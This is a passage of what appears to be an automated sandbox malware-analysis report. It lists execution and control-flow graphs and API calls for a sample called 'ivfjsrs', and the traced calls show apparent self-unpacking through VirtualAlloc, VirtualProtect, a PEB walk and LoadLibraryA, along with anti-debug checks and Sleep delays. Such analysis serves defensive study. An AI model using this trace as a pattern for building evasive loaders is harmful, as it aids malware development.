                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2296802517.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_40b000_ivfjsrs.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: 546156d34ab6ee1089efc4ea19fc89f106c9727d11cbe4cec4e4add1c920c602
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: 0D013D7700014AFBCF126E94CC418EE3F66FF18354B588426FA6869171D33AC9B1AB89
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:5.4%
                    Dynamic/Decrypted Code Coverage:21.9%
                    Signature Coverage:0%
                    Total number of Nodes:215
                    Total number of Limit Nodes:10
                    execution_graph 5453 40e400 RtlUnwind 5454 40b001 5455 40b017 ___FrameUnwindToState IsInExceptionSpec ___TypeMatch 5454->5455 5456 40b1d5 RtlEncodePointer 5455->5456 5457 40b13b 5455->5457 5456->5457 5467 4018c2 5468 4018d1 5467->5468 5469 401911 Sleep 5468->5469 5470 40192c 5469->5470 5335 413c510 5338 413c51e 5335->5338 5339 413c52d 5338->5339 5342 413ccbe 5339->5342 5343 413ccd9 Module32First 5342->5343 5345 413c51d 5343->5345 5346 413cd0d 5343->5346 5348 413c97d 5346->5348 5349 413c9a8 5348->5349 5350 413c9f1 5349->5350 5351 413c9b9 VirtualAlloc 5349->5351 5350->5350 5351->5350 5515 5c60005 5520 5c6092b GetPEB 5515->5520 5517 5c60030 5522 5c6003c 5517->5522 5521 5c60972 5520->5521 5521->5517 5523 5c60049 5522->5523 5524 5c60e0f 2 API calls 5523->5524 5525 5c60223 5524->5525 5526 5c60d90 GetPEB 5525->5526 5527 5c60238 VirtualAlloc 5526->5527 5528 5c60265 5527->5528 5529 5c602ce VirtualProtect 5528->5529 5531 5c6030b 5529->5531 5530 5c60439 VirtualFree 5534 5c604be LoadLibraryA 5530->5534 5531->5530 5533 5c608c7 5534->5533 5549 40da43 5550 40da51 5549->5550 5551 40da56 5549->5551 5555 40ed03 CreateFileW 5550->5555 5553 40da60 5551->5553 5554 40da67 WriteConsoleW 5551->5554 5554->5553 5555->5551 5535 5c60001 5536 5c60005 5535->5536 5537 5c6092b GetPEB 5536->5537 5538 5c60030 5537->5538 5539 5c6003c 7 API calls 5538->5539 5540 5c60038 5539->5540 5609 40d7c7 5610 40d7d3 5609->5610 5613 40d7e4 5610->5613 5617 40d5d2 5610->5617 5615 40d85c 5626 40d899 5615->5626 5620 40d5de ___lock_fhandle 5617->5620 5618 40d62d RtlEnterCriticalSection 5619 40d653 5618->5619 5619->5615 5621 40d8c3 5619->5621 5620->5618 5622 40d8d3 __lseeki64_nolock 5621->5622 5623 40d8ec SetFilePointerEx 5622->5623 5625 40d8db 5622->5625 5624 40d904 GetLastError 5623->5624 5623->5625 5624->5625 5625->5615 5629 40d74d RtlLeaveCriticalSection 5626->5629 5628 40d89f 5628->5613 5629->5628 5379 40c20c 5382 40c21d 5379->5382 5383 40c22f 5382->5383 5390 40e724 5383->5390 5385 40c23b 5386 40c24f 5385->5386 5395 40e5b6 5385->5395 5387 40e724 __forcdecpt_l 8 API calls 5386->5387 5389 40c219 5387->5389 5391 40e730 5390->5391 5392 40e742 5390->5392 5391->5385 5400 40e5e1 5392->5400 5396 40e5c2 5395->5396 5397 40e5d3 5395->5397 5396->5385 5445 40e564 5397->5445 5401 40e5f4 5400->5401 5402 40e600 5401->5402 5404 40e660 5401->5404 5406 40e615 5402->5406 5411 40e10c 5402->5411 5407 40cd77 5404->5407 5406->5385 5408 40cd88 5407->5408 5415 40cb73 5408->5415 5410 40cda9 5410->5406 5413 40e11e 5411->5413 5412 40e12b 5412->5406 5413->5412 5434 40ced3 5413->5434 5417 40cb8c MultiByteToWideChar 5415->5417 5422 40cbf2 5417->5422 5428 40cbeb __freea 5417->5428 5418 40cc51 MultiByteToWideChar 5419 40cc6a 5418->5419 5418->5428 5430 40d47b 5419->5430 5421 40cc7e 5423 40cc94 5421->5423 5427 40ccc0 5421->5427 5421->5428 5422->5418 5422->5428 5424 40d47b __crtLCMapStringA_stat 2 API calls 5423->5424 5423->5428 5424->5428 5425 40d47b __crtLCMapStringA_stat 2 API calls 5426 40cd2b 5425->5426 5426->5428 5429 40cd45 WideCharToMultiByte 5426->5429 5427->5425 5427->5428 5428->5410 5429->5428 5431 40d4a6 __crtLCMapStringA_stat 5430->5431 5432 40d48b LCMapStringEx 5430->5432 5433 40d4bd LCMapStringW 5431->5433 5432->5421 5433->5421 5435 40cee4 5434->5435 5438 40cddb 5435->5438 5437 40ceff 5437->5412 5439 40ce02 MultiByteToWideChar 5438->5439 5440 40cdf5 5438->5440 5442 40ce2e __cftof2_l 5439->5442 5443 40ce27 __freea 5439->5443 5440->5439 5441 40ce8c MultiByteToWideChar 5441->5443 5444 40cea6 GetStringTypeW 5441->5444 5442->5441 5442->5443 5443->5437 5444->5443 5447 40e575 5445->5447 5446 40e58c 5446->5385 5447->5446 5448 40e10c __isctype_l 3 API calls 5447->5448 5448->5446 5458 40dc12 5459 40dc1b 5458->5459 5463 40dc26 5458->5463 5460 40dc43 RtlReAllocateHeap 5461 40dc2e 5460->5461 5460->5463 5462 40dca3 GetLastError 5462->5461 5463->5460 5463->5461 5463->5462 5465 40dc8b GetLastError 5463->5465 5465->5461 5604 40c2d3 5606 40c2e6 __controlfp_s 5604->5606 5605 40c2ed 5606->5605 5607 40c2fd RtlEncodePointer 5606->5607 5607->5607 5608 40c317 5607->5608 5352 402e54 5353 402e4a 5352->5353 5354 402ee5 5353->5354 5356 4018c3 5353->5356 5357 4018d1 5356->5357 5358 401911 Sleep 5357->5358 5359 40192c 5358->5359 5359->5354 5491 40b114 5492 40b138 5491->5492 5493 40b11c 5491->5493 5494 40b121 5493->5494 5496 40b154 ___FrameUnwindToState 5493->5496 5499 40b1ad 5494->5499 5497 40b1d5 RtlEncodePointer 5496->5497 5498 40b1e4 5496->5498 5497->5498 5500 40b1c2 5499->5500 5502 40b1e4 5499->5502 5501 40b1d5 RtlEncodePointer 5500->5501 5500->5502 5501->5502 5502->5492 5556 40de5b 5559 40dd37 5556->5559 5558 40de71 5560 40dd49 5559->5560 5561 40ddf9 WideCharToMultiByte 5560->5561 5563 40dd4d __cftof2_l 5560->5563 5562 40de29 GetLastError 5561->5562 5561->5563 5562->5563 5563->5558 5568 40d21d 5569 40d247 5568->5569 5570 40d310 IsDebuggerPresent 5569->5570 5571 40d260 LoadLibraryExW 5569->5571 5572 40d335 5570->5572 5573 40d31a 5570->5573 5574 40d277 GetLastError 5571->5574 5575 40d29d GetProcAddress 5571->5575 5579 40d33a RtlDecodePointer 5572->5579 5586 40d328 5572->5586 5577 40d321 OutputDebugStringW 5573->5577 5573->5586 5576 40d286 LoadLibraryExW 5574->5576 5574->5586 5578 40d2b1 GetProcAddress 5575->5578 5575->5586 5576->5575 5576->5586 5577->5586 5581 40d2c8 GetProcAddress 5578->5581 5579->5586 5582 40d2dc GetProcAddress 5581->5582 5583 40d2f0 5582->5583 5584 40d2f9 GetProcAddress 5583->5584 5585 40d308 5583->5585 5584->5585 5585->5570 5564 40d660 5565 40d6bd 5564->5565 5566 40d66c 5564->5566 5566->5565 5567 40d6b7 SetStdHandle 5566->5567 5567->5565 5541 402da5 5542 402da8 5541->5542 5543 4018c3 Sleep 5542->5543 5544 402ee5 5542->5544 5543->5544 5591 40da2b 5594 40d936 5591->5594 5595 40d945 5594->5595 5598 40d951 5594->5598 5596 40d9e5 MultiByteToWideChar 5595->5596 5597 40d9a5 5595->5597 5595->5598 5596->5598 5597->5598 5599 40d9b3 MultiByteToWideChar 5597->5599 5599->5598 5479 40ecf1 5480 40ed02 5479->5480 5481 40ecf6 5479->5481 5481->5480 5482 40ecfb CloseHandle 5481->5482 5482->5480 5503 40d535 5504 40d541 5503->5504 5505 40d586 RtlDeleteCriticalSection 5504->5505 5506 40d5b2 __fcloseall 5504->5506 5505->5504 5360 5c6003c 5361 5c60049 5360->5361 5373 5c60e0f SetErrorMode SetErrorMode 5361->5373 5366 5c60265 5367 5c602ce VirtualProtect 5366->5367 5369 5c6030b 5367->5369 5368 5c60439 VirtualFree 5372 5c604be LoadLibraryA 5368->5372 5369->5368 5371 5c608c7 5372->5371 5374 5c60223 5373->5374 5375 5c60d90 5374->5375 5376 5c60dad 5375->5376 5377 5c60dbb GetPEB 5376->5377 5378 5c60238 VirtualAlloc 5376->5378 5377->5378 5378->5366 5449 40dcbd 5451 40dcc8 5449->5451 5450 40dcf3 RtlAllocateHeap 5450->5451 5452 40dcd4 5450->5452 5451->5450 5451->5452

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 5c6003c-5c60047 1 5c6004c-5c60263 call 5c60a3f call 5c60e0f call 5c60d90 VirtualAlloc 0->1 2 5c60049 0->2 17 5c60265-5c60289 call 5c60a69 1->17 18 5c6028b-5c60292 1->18 2->1 22 5c602ce-5c603c2 VirtualProtect call 5c60cce call 5c60ce7 17->22 19 5c602a1-5c602b0 18->19 21 5c602b2-5c602cc 19->21 19->22 21->19 29 5c603d1-5c603e0 22->29 30 5c603e2-5c60437 call 5c60ce7 29->30 31 5c60439-5c604b8 VirtualFree 29->31 30->29 33 5c605f4-5c605fe 31->33 34 5c604be-5c604cd 31->34 35 5c60604-5c6060d 33->35 36 5c6077f-5c60789 33->36 38 5c604d3-5c604dd 34->38 35->36 42 5c60613-5c60637 35->42 40 5c607a6-5c607b0 36->40 41 5c6078b-5c607a3 36->41 38->33 39 5c604e3-5c60505 38->39 51 5c60517-5c60520 39->51 52 5c60507-5c60515 39->52 44 5c607b6-5c607cb 40->44 45 5c6086e-5c608be LoadLibraryA 40->45 41->40 46 5c6063e-5c60648 42->46 48 5c607d2-5c607d5 44->48 50 5c608c7-5c608f9 45->50 46->36 49 5c6064e-5c6065a 46->49 53 5c607d7-5c607e0 48->53 54 5c60824-5c60833 48->54 49->36 55 5c60660-5c6066a 49->55 56 5c60902-5c6091d 50->56 57 5c608fb-5c60901 50->57 58 5c60526-5c60547 51->58 52->58 59 5c607e4-5c60822 53->59 60 5c607e2 53->60 62 5c60839-5c6083c 54->62 61 5c6067a-5c60689 55->61 57->56 63 5c6054d-5c60550 58->63 59->48 60->54 64 5c60750-5c6077a 61->64 65 5c6068f-5c606b2 61->65 62->45 66 5c6083e-5c60847 62->66 68 5c60556-5c6056b 63->68 69 5c605e0-5c605ef 63->69 64->46 70 5c606b4-5c606ed 65->70 71 5c606ef-5c606fc 65->71 72 5c6084b-5c6086c 66->72 73 5c60849 66->73 74 5c6056f-5c6057a 68->74 75 5c6056d 68->75 69->38 70->71 76 5c606fe-5c60748 71->76 77 5c6074b 71->77 72->62 73->45 78 5c6057c-5c60599 74->78 79 5c6059b-5c605bb 74->79 75->69 76->77 77->61 84 5c605bd-5c605db 78->84 79->84 84->63
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 05C6024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.4451244629.0000000005C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_5c60000_ivfjsrs.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: b4f774dec7f8296483ca9c0085d20ef1f6401d36a4dca4719306c3aa2a2800dc
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: C6526874A01229DFDB64CF68C984BA8BBB1BF09304F1484D9E94DBB351DB30AA85DF15
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 85 40d47b-40d489 86 40d4a6-40d4c6 call 40d451 LCMapStringW 85->86 87 40d48b-40d4a5 LCMapStringEx 85->87
                    APIs
                    • LCMapStringEx.KERNELBASE(?,?,?,?,?,?,00000000,00000000,00000000,?,0040CC7E,?,?,00000000,?,00000000), ref: 0040D4A2
                    • LCMapStringW.KERNEL32(00000000,?,?,?,?,?,?,0040CC7E,?,?,00000000,?,00000000,00000000), ref: 0040D4BF
                    Memory Dump Source
                    • Source File: 00000006.00000002.4448924570.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_40b000_ivfjsrs.jbxd
                    Similarity
                    • API ID: String
                    • String ID:
                    • API String ID: 2568140703-0
                    • Opcode ID: 2ae232fb656378ce483d58b65c5ffb3af57457b4fba3747539c215fd1d4e99ef
                    • Instruction ID: 570daf4adb4621a24a7f0c796f3d6176889b68d62c2a7a6e92a15093398afc95
                    • Opcode Fuzzy Hash: 2ae232fb656378ce483d58b65c5ffb3af57457b4fba3747539c215fd1d4e99ef
                    • Instruction Fuzzy Hash: 74F01F72010109BFDF069FD4ED0ACEB3B6AFB48354B048429FA1855061D776A971AB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 90 5c60e0f-5c60e24 SetErrorMode * 2 91 5c60e26 90->91 92 5c60e2b-5c60e2c 90->92 91->92
                    APIs
                    • SetErrorMode.KERNELBASE(00000400,?,?,05C60223,?,?), ref: 05C60E19
                    • SetErrorMode.KERNELBASE(00000000,?,?,05C60223,?,?), ref: 05C60E1E
                    Memory Dump Source
                    • Source File: 00000006.00000002.4451244629.0000000005C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_5c60000_ivfjsrs.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: f936fd5470bb6636453be33c34ffb0273aa79846dea28612e14fc2c1473532d2
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: BED0123154912877D7002A94DC0DBCD7B1CDF05B62F008411FB0DE9080C770964046E5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 93 413ccbe-413ccd7 94 413ccd9-413ccdb 93->94 95 413cce2-413ccee 94->95 96 413ccdd 94->96 98 413ccf0-413ccf6 95->98 99 413ccfe-413cd0b Module32First 95->99 96->95 98->99 105 413ccf8-413ccfc 98->105 100 413cd14-413cd1c 99->100 101 413cd0d-413cd0e call 413c97d 99->101 106 413cd13 101->106 105->94 105->99 106->100
                    APIs
                    • Module32First.KERNEL32(00000000,00000224), ref: 0413CD06
                    Memory Dump Source
                    • Source File: 00000006.00000002.4450918361.0000000004136000.00000040.00000020.00020000.00000000.sdmp, Offset: 04136000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4136000_ivfjsrs.jbxd
                    Yara matches
                    Similarity
                    • API ID: FirstModule32
                    • String ID:
                    • API String ID: 3757679902-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: dd3d3761ba599af92c2a02c9885defcf84a1a185223d9d04f07e9968566fe9a8
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: 5AF062371007116BD7202BB598CCBAAB6E8AF49726F100569E646B20C0EB70F8458AA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 107 4018c2-40192e call 401163 Sleep call 4013ed 121 401930-401938 call 4014e2 107->121 122 40193d-401990 call 401163 107->122 121->122
                    APIs
                    • Sleep.KERNELBASE(00001388,000000DE), ref: 00401919
                    Memory Dump Source
                    • Source File: 00000006.00000002.4448887586.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_ivfjsrs.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: ff9f01ca4c393a08f76f6e5a838ed7a3d2660925920f57d41366f9cbdd6b62ca
                    • Instruction ID: 4745c2705094581d0f5999afd28ebaee23fd0fd9cdaa7dedec1be42f8ab6d50d
                    • Opcode Fuzzy Hash: ff9f01ca4c393a08f76f6e5a838ed7a3d2660925920f57d41366f9cbdd6b62ca
                    • Instruction Fuzzy Hash: C3118FB224C205EBD7006AE49D91EAA7764AB01710F308137FA477A1F0D27D9A13F71B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 136 4018c3-4018cc 137 4018e0 136->137 138 4018d1-401927 call 401163 Sleep call 4013ed 136->138 137->138 149 40192c-40192e 138->149 150 401930-401938 call 4014e2 149->150 151 40193d-401990 call 401163 149->151 150->151
                    APIs
                    • Sleep.KERNELBASE(00001388,000000DE), ref: 00401919
                    Memory Dump Source
                    • Source File: 00000006.00000002.4448887586.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_ivfjsrs.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 672354b48b4500f80d7e3316d7c3cbb6db3200aabee133b507ba3e6b46ef9c0c
                    • Instruction ID: 53cc65aa0172f3087033d362448bdc94b21a8511efdb665d8b99a9a355c9eb06
                    • Opcode Fuzzy Hash: 672354b48b4500f80d7e3316d7c3cbb6db3200aabee133b507ba3e6b46ef9c0c
                    • Instruction Fuzzy Hash: 5B114FB220C205EBD6006A949D92E6A3668AB01754F308137BA477A1F0D17D9A53F76B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 165 4018ce-40192e call 401163 Sleep call 4013ed 174 401930-401938 call 4014e2 165->174 175 40193d-401990 call 401163 165->175 174->175
                    APIs
                    • Sleep.KERNELBASE(00001388,000000DE), ref: 00401919
                    Memory Dump Source
                    • Source File: 00000006.00000002.4448887586.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_ivfjsrs.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 839399c0c5f771f145dcf59bf77482c10cae34aed270f924c99471655a6f096b
                    • Instruction ID: c74ef3fd805783007b5872fe690244dae77f590db066df4350d3399cd1107ce2
                    • Opcode Fuzzy Hash: 839399c0c5f771f145dcf59bf77482c10cae34aed270f924c99471655a6f096b
                    • Instruction Fuzzy Hash: A211E9B2208205EBDB006BA0CC92FA93764AF01710F244177F6577A0F1D67D9A13EB1B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 189 4018ed-40192e call 401163 Sleep call 4013ed 200 401930-401938 call 4014e2 189->200 201 40193d-401990 call 401163 189->201 200->201
                    APIs
                    • Sleep.KERNELBASE(00001388,000000DE), ref: 00401919
                    Memory Dump Source
                    • Source File: 00000006.00000002.4448887586.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_ivfjsrs.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 3d89ce9320b16bd182f6e0f70523ef1a230dfde452e476c137488484a014d7a9
                    • Instruction ID: 5192c5fd7ad846daa7d68e837b6c6d3e663b4b5ca2644085206a245cacfb9c55
                    • Opcode Fuzzy Hash: 3d89ce9320b16bd182f6e0f70523ef1a230dfde452e476c137488484a014d7a9
                    • Instruction Fuzzy Hash: C80152B2208205EBDB006AD09D91F6A3364AF01714F308137BA17790F1D67D9A53F71B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 215 4018f4-40192e call 401163 Sleep call 4013ed 222 401930-401938 call 4014e2 215->222 223 40193d-401990 call 401163 215->223 222->223
                    APIs
                    • Sleep.KERNELBASE(00001388,000000DE), ref: 00401919
                    Memory Dump Source
                    • Source File: 00000006.00000002.4448887586.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_ivfjsrs.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 2781643a89c76b53395398b29c757f4b6a622ff20d524e454b014cf587dda4ad
                    • Instruction ID: 6301a06c588b47d17a354cf59e3a00cdfa51c18b5066a88522684ebbc7f3c5b3
                    • Opcode Fuzzy Hash: 2781643a89c76b53395398b29c757f4b6a622ff20d524e454b014cf587dda4ad
                    • Instruction Fuzzy Hash: 3C0175B1248105EBDB006AE49D91FAE33546F05714F204133FA577A1F1D27D9913E76B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 237 401907-40192e call 401163 Sleep call 4013ed 245 401930-401938 call 4014e2 237->245 246 40193d-401990 call 401163 237->246 245->246
                    APIs
                    • Sleep.KERNELBASE(00001388,000000DE), ref: 00401919
                    Memory Dump Source
                    • Source File: 00000006.00000002.4448887586.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_ivfjsrs.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: fc479d8f8625d3ec0a4cfd76c356c3dcf65cd00e53a367061983570e5a5f091e
                    • Instruction ID: ddfa02207d2976e6176cbc7aeabde5bcf8e04bb4bd45437ba787a0bf3f4ebc64
                    • Opcode Fuzzy Hash: fc479d8f8625d3ec0a4cfd76c356c3dcf65cd00e53a367061983570e5a5f091e
                    • Instruction Fuzzy Hash: D10171B1208205EBDB006AE4DD91F6A3364AF05714F204137FA577A0F0C27E9A53E72B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 260 413c97d-413c9b7 call 413cc90 263 413ca05 260->263 264 413c9b9-413c9ec VirtualAlloc call 413ca0a 260->264 263->263 266 413c9f1-413ca03 264->266 266->263
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0413C9CE
                    Memory Dump Source
                    • Source File: 00000006.00000002.4450918361.0000000004136000.00000040.00000020.00020000.00000000.sdmp, Offset: 04136000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4136000_ivfjsrs.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: 699b8c96fe528ea2b33fbd24db015f658bc9b95266da78f0a77d5059c09a7c8d
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: 39110C79A00208EFDB01DF98C985E99BBF5AF08751F158094F948AB361E771EA50DF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindHandlerForForeignException.LIBCMT ref: 0040B133
                    • ___FrameUnwindToState.LIBCMT ref: 0040B19C
                    • RtlEncodePointer.NTDLL(00000000), ref: 0040B1D7
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.4448924570.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_40b000_ivfjsrs.jbxd
                    Similarity
                    • API ID: EncodeExceptionFindForeignFrameHandlerPointerStateUnwind
                    • String ID: LEA$MOC$RCC$TEA
                    • API String ID: 1036487854-2731589300
                    • Opcode ID: 1a2bd6febaed6d2cf79add096828e36a246bb04c73bc044f33d159c1ebe0c176
                    • Instruction ID: fde7f3cf3d54f177af3fd344ca719e7cdbfe60c4783f3b80faa380b6aa17e4eb
                    • Opcode Fuzzy Hash: 1a2bd6febaed6d2cf79add096828e36a246bb04c73bc044f33d159c1ebe0c176
                    • Instruction Fuzzy Hash: E651BE32500109AFDF11DF80CC45EAEB766EF84318F1881AEFA1476292C739AD60CF99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ___TypeMatch.LIBCMT ref: 0040B031
                    • IsInExceptionSpec.LIBCMT ref: 0040B0DA
                    • ___FrameUnwindToState.LIBCMT ref: 0040B19C
                    • RtlEncodePointer.NTDLL(00000000), ref: 0040B1D7
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.4448924570.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_40b000_ivfjsrs.jbxd
                    Similarity
                    • API ID: EncodeExceptionFrameMatchPointerSpecStateTypeUnwind
                    • String ID: MOC$RCC
                    • API String ID: 2268674365-2084237596
                    • Opcode ID: ab32939c3ea4cad5d0379ab34813940f09444cff58c9fdd57895ec532d556492
                    • Instruction ID: fe3876bf30caa339d60e068b76d1540c14f00c9adcebcf3be3f80ea161fb876a
                    • Opcode Fuzzy Hash: ab32939c3ea4cad5d0379ab34813940f09444cff58c9fdd57895ec532d556492
                    • Instruction Fuzzy Hash: 2D81AB31900209AFDF11DF94C845EAEBBB6FF48314F1481AAF91477291C739A961CF99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.4448924570.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_40b000_ivfjsrs.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: 546156d34ab6ee1089efc4ea19fc89f106c9727d11cbe4cec4e4add1c920c602
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: 0D013D7700014AFBCF126E94CC418EE3F66FF18354B588426FA6869171D33AC9B1AB89
                    Uniqueness

                    Uniqueness Score: -1.00%